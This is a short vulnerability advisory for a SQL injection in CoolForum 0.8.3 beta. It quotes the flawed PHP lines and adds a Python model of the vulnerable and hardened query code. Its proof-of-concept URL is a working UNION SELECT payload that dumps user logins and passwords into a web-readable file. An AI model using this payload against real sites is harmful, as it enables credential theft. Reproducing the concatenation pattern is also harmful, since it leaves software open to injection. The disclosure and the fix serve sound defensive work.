
Critical SQL Injection in CoolForum

Type: SQL Injection
Risk: Critical
Product: CoolForum <= 0.8.3 beta
********************************


Vulnerability
*************
// File: editpost.php
// Line 38
//
if(isset($_REQUEST['post'])) $post = intval($_REQUEST['post']);
else $post = 0;
--
// Line 77
//
$canedit = getrightedit($_REQUEST['post'],$_REQUEST['forumid']);
// NOTE: the intval()-sanitised $post from line 38 is never used here;
// the raw, unchecked request value is passed to getrightedit() instead.
--
// File: admin/functions.php
// Line 623
//
function getrightedit($idpost,$forumid)
{
global $_MODORIGHTS, $sql, $_USER, $_FORUMCFG, $_PRE, $_GENERAL, $_PERMFORUM;
// $idpost is concatenated directly into the statement without quoting or a type check.
$query = $sql->query("SELECT idforum,idmembre,parent FROM ".$_PRE."posts WHERE idpost=".$idpost);
$j = mysql_fetch_array($query);
--
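The flaw above, modelled in Python as an added example (this is not CoolForum's code): the vulnerable path concatenates the raw request value exactly as line 623 does, while the hardened form applies the integer check that line 38 already performs and binds the value as a query parameter. The cf_posts table and its rows are constructed here, and the cf_ prefix is assumed from the cf_user table named in the proof of concept.

```python
import sqlite3

# Constructed sample rows standing in for CoolForum's posts table
# (columns: idpost, idforum, idmembre, parent; "cf_" prefix assumed).
SAMPLE_POSTS = [
    (1, 1, 10, 0),
    (2, 1, 11, 1),
    (3, 2, 12, 0),
]


def make_db():
    """In-memory stand-in for the forum database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE cf_posts (idpost INTEGER, idforum INTEGER, "
        "idmembre INTEGER, parent INTEGER)"
    )
    conn.executemany("INSERT INTO cf_posts VALUES (?,?,?,?)", SAMPLE_POSTS)
    return conn


def build_query_vulnerable(raw_post):
    """Mirrors admin/functions.php line 623: the request value is pasted
    into the statement, so anything that is not a number becomes SQL."""
    return "SELECT idforum,idmembre,parent FROM cf_posts WHERE idpost=" + str(raw_post)


def getrightedit_vulnerable(conn, raw_post):
    """The original call path: the intval()-checked value is never used."""
    return conn.execute(build_query_vulnerable(raw_post)).fetchall()


def getrightedit_safe(conn, raw_post):
    """Hardened form: coerce once, then bind. Unlike PHP's intval(), which
    keeps the leading digits of "3 OR 1=1", this rejects non-integers outright."""
    try:
        idpost = int(str(raw_post).strip())
    except ValueError:
        return []  # not a post id: no edit rights and no query executed
    return conn.execute(
        "SELECT idforum,idmembre,parent FROM cf_posts WHERE idpost=?", (idpost,)
    ).fetchall()
```

With the same non-numeric input, the vulnerable path returns every row in the table while the safe path returns nothing, which is the difference a regression test for this fix should assert on.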
=0D
=0D
Proof Of Concept
****************
http://[...]/editpost.php?forumid=1&post=3 UNION SELECT userid,login,password FROM cf_user INTO OUTFILE '/www/web/resultat.txt'%23&parent=1&p=1


Credits
*******
Ref : http://mgsdl.free.fr/advisories/coolforum083ba.txt
Note: Other SQL injections exist, but they are difficult to exploit.
by DarkFig
